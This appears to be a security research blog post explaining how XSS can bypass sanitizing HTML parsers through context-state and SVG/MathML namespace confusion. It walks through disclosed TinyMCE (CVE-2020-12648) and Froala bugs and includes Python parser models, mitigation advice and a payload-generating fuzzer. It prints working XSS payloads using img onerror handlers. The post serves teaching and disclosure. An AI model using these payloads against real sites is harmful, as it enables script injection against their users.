Introduction to Key Concepts
Cross-site Scripting (XSS) Protections
What if users require the ability to include some HTML such as images, links, and rich text? This is where lexical parsing comes into play.
Cross-site Scripting (XSS) Protections via Lexical Parsing
Some examples that allow a subset of HTML by design are rich-text editors, email clients, What-You-See-Is-What-You-Get (WYSIWYG) HTML editors like TinyMCE or Froala, and sanitization libraries such as DOMPurify. Among these examples, this form of lexical parsing protection is commonplace.
How the Data Flows Through the HTML Parser
To understand how we can achieve XSS in an application that uses lexical analysis on HTML input, we first must look at how HTML is parsed and how content is determined to be either data or instructions. The figure below is a visualization of the HTML parser's order of operations:
The steps in this visualization are as follows:
- Network – This stage refers to the transfer of input as bytes to the parser.
- Tokenizer – Tokenization is where the lexical parsing occurs. The parser will separate text data from computer instructions. To do this, the tokenizer will switch contexts between data states depending on the element it encounters and return the values as tokens. This is covered in more detail in the Context State section.
- Tree Construction – The tokens returned from the tokenization stage are placed in a tree structure; each of the tree branches is known as a node. For a clearer picture of what this looks like in practice, let's examine the following HTML snippet:
<!DOCTYPE html> <body> <div> Hello World <a href=https://bishopfox.com>Example</a></div> </body>
The figure below shows what this looks like in the document object model (DOM) tree structure:
Our goal as an attacker is to control the node in this stage of HTML parsing. As my mentor Joe DeMesy once described it to me, if you can control a node's context and content, you will have XSS.
- DOM – The end state of the processing where the document object model is built.
Now you should have a high-level understanding of how data flows through the HTML parsing process and how the information is organized, which will come into play during exploitation.
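As a rough illustration of the tokenizer and tree construction stages, the sketch below feeds the snippet from this section through Python's standard-library `html.parser` and nests the resulting tokens into a tree. The `TreeBuilder`, `build_tree`, and `render` names are hypothetical helpers written for this example. This is not a browser-grade parser: it does not insert implied elements such as `<html>` or `<head>`, so the real DOM will contain more nodes.

```python
from html.parser import HTMLParser


class TreeBuilder(HTMLParser):
    """Toy tree construction: nests element and text nodes by open/close tags."""

    def __init__(self):
        super().__init__()
        self.root = {"name": "#document", "children": []}
        self.stack = [self.root]  # elements that are currently open

    def handle_starttag(self, tag, attrs):
        node = {"name": tag, "attrs": dict(attrs), "children": []}
        self.stack[-1]["children"].append(node)
        self.stack.append(node)

    def handle_endtag(self, tag):
        # Close everything back to the nearest matching open element, if any.
        for i in range(len(self.stack) - 1, 0, -1):
            if self.stack[i]["name"] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        text = data.strip()
        if text:  # skip whitespace-only text for readability
            self.stack[-1]["children"].append(
                {"name": "#text", "text": text, "children": []}
            )


def build_tree(html):
    builder = TreeBuilder()
    builder.feed(html)
    builder.close()
    return builder.root


def render(node, depth=0):
    """Return the tree as a list of indented lines."""
    label = node["name"]
    if label == "#text":
        label += ' "' + node["text"] + '"'
    lines = ["  " * depth + label]
    for child in node["children"]:
        lines.extend(render(child, depth + 1))
    return lines


SNIPPET = (
    "<!DOCTYPE html> <body> <div> Hello World "
    "<a href=https://bishopfox.com>Example</a></div> </body>"
)
tree = build_tree(SNIPPET)
print("\n".join(render(tree)))
```

Each printed line corresponds to one node, and the indentation shows which node it was placed under.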
The Concept of the HTML Parser's Context State
During the tokenization stage, the HTML parser will sort the HTML elements into different categories of data states known as the Context State. The HTML specification lists the Context State switching elements as follows:
Set the state of the HTML parser's tokenization stage as follows, switching on the context element:
title, textarea
Switch the tokenizer to the RCDATA state.
style, xmp, iframe, noembed, noframes
Switch the tokenizer to the RAWTEXT state.
script
Switch the tokenizer to the script data state.
noscript
If the scripting flag is enabled, switch the tokenizer to the RAWTEXT state. Otherwise, leave the tokenizer in the data state.
plaintext
Switch the tokenizer to the PLAINTEXT state.
Any other element
Leave the tokenizer in the data state.
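The switching rules above can be written down as a small lookup. The sketch below is only a restatement of the list, with element names taken from the HTML specification; `initial_tokenizer_state` and its `scripting_enabled` parameter are hypothetical names chosen for this example.

```python
RCDATA_ELEMENTS = {"title", "textarea"}
RAWTEXT_ELEMENTS = {"style", "xmp", "iframe", "noembed", "noframes"}


def initial_tokenizer_state(context_element, scripting_enabled=True):
    """Return the tokenizer state selected by the given context element."""
    name = context_element.lower()
    if name in RCDATA_ELEMENTS:
        return "RCDATA"
    if name in RAWTEXT_ELEMENTS:
        return "RAWTEXT"
    if name == "script":
        return "script data"
    if name == "noscript":
        # Depends on the scripting flag, as described in the list above.
        return "RAWTEXT" if scripting_enabled else "data"
    if name == "plaintext":
        return "PLAINTEXT"
    return "data"  # any other element


for element in ("textarea", "iframe", "script", "noscript", "plaintext", "div"):
    print(element, "->", initial_tokenizer_state(element))
```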
The visualization below shows what some of these context states look like in practice:
Screenshot of output:
Screenshot of output:
Note that the data state is the only state that attempted to load an image. This is because content in the data state is parsed as markup (computer instructions), whereas content in the other states is treated as plain text data.
Different supplied elements alter how data in those elements is parsed and rendered by switching the Context State of the data.
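To make the effect of the context state concrete, here is a minimal sketch of a tokenizer that switches state on the elements listed by the specification. It is a heavily simplified model written for this example (`tokenize`, `TEXT_STATES`, and `TAG` are hypothetical names): it ignores comments, character references, and `>` inside quoted attribute values, and it assumes scripting is enabled for `noscript`.

```python
import re

TEXT_STATES = {
    "title": "RCDATA", "textarea": "RCDATA",
    "style": "RAWTEXT", "xmp": "RAWTEXT", "iframe": "RAWTEXT",
    "noembed": "RAWTEXT", "noframes": "RAWTEXT",
    "noscript": "RAWTEXT",  # assumption: scripting flag enabled
    "script": "script data", "plaintext": "PLAINTEXT",
}
TAG = re.compile(r"<(/?)([a-zA-Z][^\s/>]*)[^>]*>")


def tokenize(html):
    """Return (kind, value, state) tuples; state is the one the token was read in."""
    tokens, pos, state, owner = [], 0, "data", None
    while pos < len(html):
        if state == "PLAINTEXT":
            # PLAINTEXT never ends: the rest of the input is text.
            tokens.append(("text", html[pos:], state))
            break
        if state != "data":
            # Text states end only at the end tag of the element that opened them.
            end = re.compile("</" + owner + r"[\s/>]", re.I).search(html, pos)
            stop = end.start() if end else len(html)
            if stop > pos:
                tokens.append(("text", html[pos:stop], state))
            pos, state = stop, "data"
            continue
        match = TAG.search(html, pos)
        if not match:
            tokens.append(("text", html[pos:], "data"))
            break
        if match.start() > pos:
            tokens.append(("text", html[pos:match.start()], "data"))
        name = match.group(2).lower()
        if match.group(1):
            tokens.append(("end_tag", name, "data"))
        else:
            tokens.append(("start_tag", name, "data"))
            if name in TEXT_STATES:
                state, owner = TEXT_STATES[name], name
        pos = match.end()
    return tokens


for sample in (
    "<div><img src=x onerror=alert(1)></div>",
    "<textarea><img src=x onerror=alert(1)></textarea>",
    "<iframe><img src=x onerror=alert(1)></iframe>",
):
    print(tokenize(sample))
```

Only the `<div>` sample yields an `img` start tag token. In the other two samples the same characters come back as a single text token.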
Namespaces – Foreign Content and Leveraging the Unexpected Behavior
The browser’s HTML parser understands more than just HTML; it can switch between three distinct namespaces: HTML, MathML, and SVG.
During HTML parsing, if an <svg> or <math> namespace element (tag) is encountered, the parser will switch context to the respective namespace. What this context switch means to us is that the parser is no longer parsing as HTML but rather as MathML or SVG.
This namespace context switch results in unexpected behavior when HTML is embedded in MathML/SVG, as each namespace has its own distinct elements and parses slightly differently. As penetration testers, we can exploit this logic in some instances to confuse the parser into allowing XSS.
Michał Bentkowski's DOMPurify bypass writeup provides a more in-depth look at namespace confusion, including cutting-edge research and a great example.
The HTML parser will context switch to separate namespaces when it encounters MathML or SVG elements, which can be used to confuse the parser.
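One way to picture why the namespace matters: an element such as `<iframe>` or `<style>` only switches the tokenizer into a text state when it is an HTML element. The sketch below models that single idea for a chain of nested start tags. It is a deliberate simplification under stated assumptions: `classify` is a hypothetical helper, and the model ignores end tags, the elements that break back out of foreign content, and integration points where HTML parsing resumes inside SVG or MathML.

```python
TEXT_STATES = {
    "title": "RCDATA", "textarea": "RCDATA",
    "style": "RAWTEXT", "xmp": "RAWTEXT", "iframe": "RAWTEXT",
    "noembed": "RAWTEXT", "noframes": "RAWTEXT",
}
FOREIGN_ROOTS = {"svg": "svg", "math": "mathml"}


def classify(open_tags):
    """For a chain of nested start tags, return (tag, namespace, tokenizer state)."""
    namespace, result = "html", []
    for tag in open_tags:
        tag = tag.lower()
        if namespace == "html" and tag in FOREIGN_ROOTS:
            namespace = FOREIGN_ROOTS[tag]  # enter foreign content
        # Only HTML elements switch the tokenizer out of the data state.
        state = TEXT_STATES.get(tag, "data") if namespace == "html" else "data"
        result.append((tag, namespace, state))
    return result


print(classify(["iframe"]))          # HTML iframe: contents are raw text
print(classify(["math", "iframe"]))  # same tag name inside MathML: still data state
print(classify(["svg", "style"]))    # same idea for SVG
```

A sanitizer that assumes `<iframe>` always means RAWTEXT, regardless of namespace, will disagree with the browser about what follows it.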
Sanitizing Lexical Parsing Flow
To exploit sanitizing lexical parsers, we need to understand the general flow of how they work. At a high level, the general flow is as follows:
- User-supplied data is parsed as HTML by the browser's HTML parser
- The data is parsed and sanitized by the lexical parser
- The data is parsed again by the browser's HTML parser
This flow is depicted below:
The goal of exploitation is to provide HTML that will trick the sanitizing parser into believing the provided input is non-dangerous text data (RCDATA, PLAINTEXT, or RAWTEXT) when it is actually computer instructions (data state). This is often possible for several reasons: HTML is not designed to be parsed twice; slight variations in parsing can occur between the initial HTML parser and the sanitizing parser; and sanitizing parsers often implement their own processing logic.
Test Case 1 – TinyMCE XSS
CVE-2020-12648 (XSS in TinyMCE), which was discovered by George Steketee and me, will serve as a test case for how HTML parsing caveats can be leveraged to gain XSS in cases where a sanitizing parser is used. In the TinyMCE advisory, XSS was achieved with the following payload:
<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">
This payload was successful because of an issue in the tokenization and tree construction phases. In particular, when the HTML was reparsed by the lexical parser, it did not properly account for the order of elements before assigning the context state.
The <iframe> element caused the context state to switch to RAWTEXT, which meant that the data following the iframe was considered not dangerous and did not require sanitization. This context switch ended at the closing tag of </iframe>. However, the <textarea> element also instructed the parser to switch to the RCDATA context, another form of non-dangerous text data. The context switch to RCDATA was contained within the iframe elements when they were processed by the HTML parser. This containment is what the TinyMCE parser failed to realize.
When this was parsed, the TinyMCE parser failed to consider the proper order of operations and context switches. Therefore, the DOM tree construction performed by the final post-sanitization HTML parser looked like this:
The above was a result of TinyMCE's parser viewing the data incorrectly like this:
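The two views can be approximated with a toy tokenizer. The sketch below is a model of the mismatch described in this section, not TinyMCE's actual code. The `honor_nested_switch` flag is a hypothetical switch that reproduces the flawed behavior, where a context-switching element found inside another text state takes over the context.

```python
import re

TEXT_STATES = {
    "title": "RCDATA", "textarea": "RCDATA",
    "style": "RAWTEXT", "xmp": "RAWTEXT", "iframe": "RAWTEXT",
    "noembed": "RAWTEXT", "noframes": "RAWTEXT",
}
TAG = re.compile(r"<(/?)([a-zA-Z][^\s/>]*)[^>]*>")
SWITCH = re.compile(r"<(" + "|".join(TEXT_STATES) + r")(?=[\s/>])[^>]*>", re.I)


def tokenize(html, honor_nested_switch=False):
    """Return (kind, value) tokens; the flag enables the flawed nested switch."""
    tokens, pos, state, owner = [], 0, "data", None
    while pos < len(html):
        if state != "data":
            end = re.compile("</" + owner + r"[\s/>]", re.I).search(html, pos)
            stop = end.start() if end else len(html)
            nested = SWITCH.search(html, pos, stop) if honor_nested_switch else None
            if nested:
                # Flawed view: the nested element steals the context state.
                if nested.start() > pos:
                    tokens.append(("text", html[pos:nested.start()]))
                owner = nested.group(1).lower()
                state = TEXT_STATES[owner]
                tokens.append(("start_tag", owner))
                pos = nested.end()
                continue
            # Correct view: everything up to the owner's end tag is text.
            if stop > pos:
                tokens.append(("text", html[pos:stop]))
            pos, state = stop, "data"
            continue
        match = TAG.search(html, pos)
        if not match:
            tokens.append(("text", html[pos:]))
            break
        if match.start() > pos:
            tokens.append(("text", html[pos:match.start()]))
        name = match.group(2).lower()
        if match.group(1):
            tokens.append(("end_tag", name))
        else:
            tokens.append(("start_tag", name))
            if name in TEXT_STATES:
                state, owner = TEXT_STATES[name], name
        pos = match.end()
    return tokens


PAYLOAD = '<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">'
print("browser-like view:", tokenize(PAYLOAD))
print("flawed view:      ", tokenize(PAYLOAD, honor_nested_switch=True))
```

In the browser-like view, `<textarea>` is just text inside the iframe and the `img` start tag is live markup. In the flawed view, everything after `<textarea>` is swallowed as text, so the `onerror` handler is never inspected.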
Test Case 2 – Froala XSS
<math><iframe><!--</iframe><img src onerror=alert("XSS")>
This payload is functionally the same as the TinyMCE XSS discussed in Test Case 1 of this blog post with one caveat. Entering the MathML namespace to cause parsing confusion (in Froala's instance, restricting a comment within iframe elements) was not enough to confuse the Froala parser. However, Froala's parser did not understand MathML namespace tags and would drop the tags but continue parsing the remaining content. The result was the HTML parser creating nodes with the payload restricted to text data, as shown in the tree below:
The result was the XSS payload execution. This can be further visualized by examining the post-exploitation source code:
<iframe><!--</iframe> <img src="" onerror="alert("XSS")" style="" class="fr-fic fr-dii"> -->
The Froala parser removed the <math> element and added a --> to close what it believed was a comment. The final-stage HTML parser viewed the opening comment as contained within iframe elements and set the closing comment element added by the Froala parser to the RCDATA state, ignoring it as a valid closing tag. The result was active content execution (XSS).
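The disagreement over the comment can be sketched in the same way. The example below is a simplified model, not Froala's code. `SANITIZED` is a shortened stand-in for the sanitized markup above, and the `rawtext_aware` flag is a hypothetical switch between a parser that treats iframe contents as raw text and one that treats `<!--` as a comment wherever it appears.

```python
import re

RAWTEXT = {"iframe", "style", "xmp", "noembed", "noframes"}
TOKEN = re.compile(
    r"<!--(?P<comment>.*?)(?:-->|\Z)"
    r"|<(?P<close>/?)(?P<name>[a-zA-Z][^\s/>]*)[^>]*>",
    re.S,
)


def tokenize(html, rawtext_aware=True):
    """Return (kind, value) tokens for comments, tags, and text."""
    tokens, pos = [], 0
    while pos < len(html):
        match = TOKEN.search(html, pos)
        if not match:
            tokens.append(("text", html[pos:]))
            break
        if match.start() > pos:
            tokens.append(("text", html[pos:match.start()]))
        pos = match.end()
        if match.group("comment") is not None:
            tokens.append(("comment", match.group("comment")))
            continue
        name = match.group("name").lower()
        if match.group("close"):
            tokens.append(("end_tag", name))
            continue
        tokens.append(("start_tag", name))
        if rawtext_aware and name in RAWTEXT:
            # Raw text runs to the matching end tag; "<!--" inside it is just text.
            end = re.compile("</" + name + r"[\s/>]", re.I).search(html, pos)
            stop = end.start() if end else len(html)
            if stop > pos:
                tokens.append(("text", html[pos:stop]))
            pos = stop
    return tokens


# Shortened stand-in: <math> dropped and a closing "-->" appended.
SANITIZED = '<iframe><!--</iframe><img src onerror=alert("XSS")> -->'
print("comment-first view:", tokenize(SANITIZED, rawtext_aware=False))
print("browser-like view: ", tokenize(SANITIZED))
```

In the comment-first view the `img` element sits inside a comment and looks harmless. In the browser-like view the comment opener is raw text inside the iframe, the `img` start tag is live, and the trailing `-->` is leftover text.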
When implementing applications that allow some user-controlled HTML by design, the key to avoiding these types of bugs is to process the HTML as close to the original parse as possible. While doing so, it is important to account for the order of elements and the context in which each element is embedded. These XSS issues within lexical analysis will arise if there is a variation in how the HTML parser views a node versus how the sanitizing parser views a node. It is also advisable to blacklist MathML and SVG namespace elements when they are not required and completely drop any request containing these (i.e., do not continue to write the data into the DOM).
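A minimal sketch of the "drop the whole request" advice is shown below, assuming a server-side check that runs before any sanitization. `contains_foreign_namespace` and `accept_or_drop` are hypothetical names. The pattern is deliberately coarse: it also fires when the tag name appears inside a text state or comment, which is acceptable when the policy is to reject rather than repair. It is a gate in front of a sanitizer, not a replacement for one.

```python
import re

# "<svg" or "<math" followed by whitespace, "/", ">", or end of input.
FOREIGN_TAG = re.compile(r"<(?:svg|math)(?=[\s/>]|\Z)", re.IGNORECASE)


def contains_foreign_namespace(html):
    """Return True if the input appears to open an SVG or MathML element."""
    return FOREIGN_TAG.search(html) is not None


def accept_or_drop(html):
    """Return the input unchanged, or None to signal the request is dropped."""
    if contains_foreign_namespace(html):
        return None  # do not continue on to sanitization or the DOM
    return html


print(accept_or_drop('<math><iframe><!--</iframe><img src onerror=alert("XSS")>'))
print(accept_or_drop("<p>Plain <b>rich text</b> about math</p>"))
```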
For organizations that are not creating these types of solutions but rather including them in their applications, a good patch policy will go a long way in preventing exploitation. I recommend checking for the latest versions of these libraries and patching them on a regular and organizationally defined basis.
Even when input is lexically analyzed, XSS may still be possible by exploiting caveats in how HTML is parsed and reparsed by whatever sanitization library is in use. When testing for this type of XSS, I recommend fuzzing inputs with various namespace and context switching elements, recording any interesting results, and working off those results.
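As a starting point for that kind of fuzzing, the sketch below builds candidate inputs by combining an optional namespace element, a context-switching element, and an inner opener, following the shape of the two payloads discussed earlier. The lists and the `candidates` generator are assumptions made for this example, and the probe is a harmless marker. Extend them to suit the target and only test applications you are authorized to assess.

```python
from itertools import product

NAMESPACE_PREFIXES = ["", "<svg>", "<math>"]
CONTEXT_ELEMENTS = [
    "title", "textarea", "style", "xmp", "iframe",
    "noembed", "noframes", "script", "noscript", "plaintext",
]
INNER_OPENERS = ["<!--", "<textarea>", "<title>", "<style>"]
PROBE = "<img src onerror=alert(1)>"


def candidates():
    """Yield inputs shaped like: [namespace]<outer>inner</outer>probe."""
    for prefix, outer, inner in product(
        NAMESPACE_PREFIXES, CONTEXT_ELEMENTS, INNER_OPENERS
    ):
        yield f"{prefix}<{outer}>{inner}</{outer}>{PROBE}"


all_candidates = list(candidates())
print(len(all_candidates), "candidates, for example:")
for candidate in all_candidates[:3]:
    print(" ", candidate)
```

Recording how the sanitized output differs from each input (dropped tags, added closers, re-quoted attributes) is usually what points to the next variation worth trying.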
WHATWG – HTML Specification
W3 – HTML Parser Working Draft
Securitum – DOMPurify Bypass
Bishop Fox – TinyMCE v5.2.1 Advisory
Hixie – DOM Tree viewer
Techopedia – Lexical Analysis Defined
PortSwigger – Preventing XSS
OWASP – Contextual Output encoding
Mozilla – Content Security Policy
CSP – CSP details